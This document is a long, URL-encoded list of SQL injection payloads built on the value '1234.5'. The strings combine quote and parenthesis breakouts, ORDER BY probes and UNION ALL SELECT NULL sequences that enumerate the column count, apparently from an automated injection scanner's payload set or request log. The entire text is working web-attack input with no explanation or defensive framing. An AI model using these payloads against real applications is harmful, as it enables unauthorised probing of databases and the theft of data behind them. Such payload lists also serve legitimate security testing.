1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Hapc%22%3D%22Hapc 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22phlR%22%3D%22phlR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zdhx%22%3D%22zdhx 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22rLgt%22%3D%22rLgt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ELgS%22%3D%22ELgS 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22LXhh%22%3D%22LXhh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22lqSU%22%3D%22lqSU 1234.5%22%20ORDER%20BY%201%23%20AND%20%22xLkH%22%3D%22xLkH 1234.5%22%20ORDER%20BY%208503%23%20AND%20%22oxvH%22%3D%22oxvH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%22FEwQ%22%3D%22FEwQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%22Flgu%22%3D%22Flgu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22VNpX%22%3D%22VNpX 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22thmP%22%3D%22thmP 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Beeu%22%3D%22Beeu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22BXeZ%22%3D%22BXeZ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22RdAX%22%3D%22RdAX 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ZbkQ%22%3D%22ZbkQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22list%22%3D%22list 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Jxyj%22%3D%22Jxyj 1234.5%22%29%20ORDER%20BY%201%23%20AND%20%28%22TtOo%22%20LIKE%20%22TtOo 1234.5%22%29%20ORDER%20BY%205338%23%20AND%20%28%22qLmk%22%20LIKE%20%22qLmk 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%22ytcV%22%20LIKE%20%22ytcV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%22akoU%22%20LIKE%20%22akoU 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22XVvU%22%20LIKE%20%22XVvU 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22NOLQ%22%20LIKE%20%22NOLQ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Bolm%22%20LIKE%20%22Bolm 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xttj%22%20LIKE%20%22xttj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22aAsb%22%20LIKE%20%22aAsb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22DCdb%22%20LIKE%20%22DCdb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22cdth%22%20LIKE%20%22cdth 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JGWi%22%20LIKE%20%22JGWi 1234.5%22%29%29%20ORDER%20BY%201%23%20AND%20%28%28%22TIHk%22%20LIKE%20%22TIHk 1234.5%22%29%29%20ORDER%20BY%204092%23%20AND%20%28%28%22kLSg%22%20LIKE%20%22kLSg 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%28%22DTtR%22%20LIKE%20%22DTtR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%28%22Vylv%22%20LIKE%20%22Vylv 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22gAKy%22%20LIKE%20%22gAKy 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22VsTW%22%20LIKE%20%22VsTW 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22MzXT%22%20LIKE%20%22MzXT 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22BLMJ%22%20LIKE%20%22BLMJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22dkYA%22%20LIKE%20%22dkYA 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22zQWh%22%20LIKE%20%22zQWh 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22vHag%22%20LIKE%20%22vHag 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22giCV%22%20LIKE%20%22giCV 1234.5%22%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%22FbOH%22%20LIKE%20%22FbOH 1234.5%22%29%29%29%20ORDER%20BY%205042%23%20AND%20%28%28%28%22Ykcj%22%20LIKE%20%22Ykcj 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%28%28%22uygx%22%20LIKE%20%22uygx 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%28%28%22RYbz%22%20LIKE%20%22RYbz 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22gSRo%22%20LIKE%20%22gSRo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Otuu%22%20LIKE%20%22Otuu 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22jcql%22%20LIKE%20%22jcql 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22pdql%22%20LIKE%20%22pdql 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22hDri%22%20LIKE%20%22hDri 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22GCOR%22%20LIKE%20%22GCOR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22FoSh%22%20LIKE%20%22FoSh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22pMbi%22%20LIKE%20%22pMbi 1234.5%22%20ORDER%20BY%201%23%20AND%20%22hNwS%22%20LIKE%20%22hNwS 1234.5%22%20ORDER%20BY%204545%23%20AND%20%22RvMg%22%20LIKE%20%22RvMg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%22KtSm%22%20LIKE%20%22KtSm 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%22zCkN%22%20LIKE%20%22zCkN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22vBPg%22%20LIKE%20%22vBPg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22VzCI%22%20LIKE%20%22VzCI 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22dQxS%22%20LIKE%20%22dQxS 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22PhHV%22%20LIKE%20%22PhHV 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22lhok%22%20LIKE%20%22lhok 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22KCTY%22%20LIKE%20%22KCTY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22WjbS%22%20LIKE%20%22WjbS 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Ymgp%22%20LIKE%20%22Ymgp 1234.5%29%20WHERE%209074%3D9074%20ORDER%20BY%201%23 1234.5%29%20WHERE%201830%3D1830%20ORDER%20BY%203809%23 1234.5%29%20WHERE%202576%3D2576%20UNION%20ALL%20SELECT%20NULL%23 1234.5%29%20WHERE%209307%3D9307%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%29%20WHERE%201397%3D1397%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%202433%3D2433%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%207898%3D7898%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%204321%3D4321%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%203514%3D3514%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%201106%3D1106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%204900%3D4900%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%204033%3D4033%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%205341%3D5341%20ORDER%20BY%201%23 1234.5%27%29%20WHERE%206990%3D6990%20ORDER%20BY%209165%23 1234.5%27%29%20WHERE%204499%3D4499%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%29%20WHERE%207165%3D7165%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%209605%3D9605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%207740%3D7740%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%208515%3D8515%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%202101%3D2101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%209801%3D9801%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%205159%3D5159%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%206660%3D6660%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%206078%3D6078%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207921%3D7921%20ORDER%20BY%201%23 1234.5%27%20WHERE%203991%3D3991%20ORDER%20BY%206975%23 1234.5%27%20WHERE%205673%3D5673%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%20WHERE%209931%3D9931%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%27%20WHERE%208014%3D8014%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204284%3D4284%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204256%3D4256%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%205082%3D5082%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%206349%3D6349%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%209013%3D9013%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204203%3D4203%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%206203%3D6203%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%202383%3D2383%20ORDER%20BY%201%23 1234.5%22%20WHERE%206400%3D6400%20ORDER%20BY%204429%23 1234.5%22%20WHERE%206119%3D6119%20UNION%20ALL%20SELECT%20NULL%23 1234.5%22%20WHERE%208106%3D8106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1234.5%22%20WHERE%207257%3D7257%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%206306%3D6306%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%209806%3D9806%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%209839%3D9839%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%209182%3D9182%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%205572%3D5572%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%207272%3D7272%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%202050%3D2050%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20%7C%7C%20%28SELECT%207999%20FROM%20DUAL%20WHERE%207463%3D7463%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209483%20FROM%20DUAL%20WHERE%203845%3D3845%20ORDER%20BY%202658%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206204%20FROM%20DUAL%20WHERE%204167%3D4167%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206542%20FROM%20DUAL%20WHERE%201038%3D1038%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202341%20FROM%20DUAL%20WHERE%202367%3D2367%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204676%20FROM%20DUAL%20WHERE%202426%3D2426%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204348%20FROM%20DUAL%20WHERE%202237%3D2237%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208039%20FROM%20DUAL%20WHERE%208763%3D8763%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202731%20FROM%20DUAL%20WHERE%205471%3D5471%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205981%20FROM%20DUAL%20WHERE%203775%3D3775%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204436%20FROM%20DUAL%20WHERE%206384%3D6384%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204990%20FROM%20DUAL%20WHERE%204868%3D4868%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203568%20WHERE%203888%3D3888%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209545%20WHERE%206862%3D6862%20ORDER%20BY%209054%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204952%20WHERE%203492%3D3492%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206597%20WHERE%201604%3D1604%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201777%20WHERE%202675%3D2675%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205807%20WHERE%207859%3D7859%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202209%20WHERE%204239%3D4239%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206956%20WHERE%206538%3D6538%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207833%20WHERE%208210%3D8210%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209237%20WHERE%205767%3D5767%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207406%20WHERE%208820%3D8820%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201079%20WHERE%205340%3D5340%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%209504%20FROM%20DUAL%20WHERE%208006%3D8006%20ORDER%20BY%201%23%20%29 1234.5%20%2B%20%28SELECT%206310%20FROM%20DUAL%20WHERE%203944%3D3944%20ORDER%20BY%209151%23%20%29 1234.5%20%2B%20%28SELECT%203463%20FROM%20DUAL%20WHERE%203567%3D3567%20UNION%20ALL%20SELECT%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206345%20FROM%20DUAL%20WHERE%209891%3D9891%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204311%20FROM%20DUAL%20WHERE%209436%3D9436%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202965%20FROM%20DUAL%20WHERE%204129%3D4129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207419%20FROM%20DUAL%20WHERE%205106%3D5106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208086%20FROM%20DUAL%20WHERE%208131%3D8131%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209808%20FROM%20DUAL%20WHERE%203686%3D3686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208458%20FROM%20DUAL%20WHERE%204632%3D4632%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203948%20FROM%20DUAL%20WHERE%201831%3D1831%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208381%20FROM%20DUAL%20WHERE%208764%3D8764%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209138%20WHERE%201932%3D1932%20ORDER%20BY%201%23%20%29 1234.5%20%2B%20%28SELECT%201427%20WHERE%205892%3D5892%20ORDER%20BY%209775%23%20%29 1234.5%20%2B%20%28SELECT%206115%20WHERE%205448%3D5448%20UNION%20ALL%20SELECT%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204134%20WHERE%207167%3D7167%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201615%20WHERE%204256%3D4256%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201613%20WHERE%207321%3D7321%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207270%20WHERE%201619%3D1619%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204929%20WHERE%208362%3D8362%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207399%20WHERE%208910%3D8910%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204091%20WHERE%206266%3D6266%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209331%20WHERE%209780%3D9780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208733%20WHERE%206053%3D6053%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27FZvY%27%20FROM%20DUAL%20WHERE%202231%3D2231%20ORDER%20BY%201%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27gUhg%27%20FROM%20DUAL%20WHERE%202846%3D2846%20ORDER%20BY%206634%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wPwC%27%20FROM%20DUAL%20WHERE%201378%3D1378%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%2B%20%27 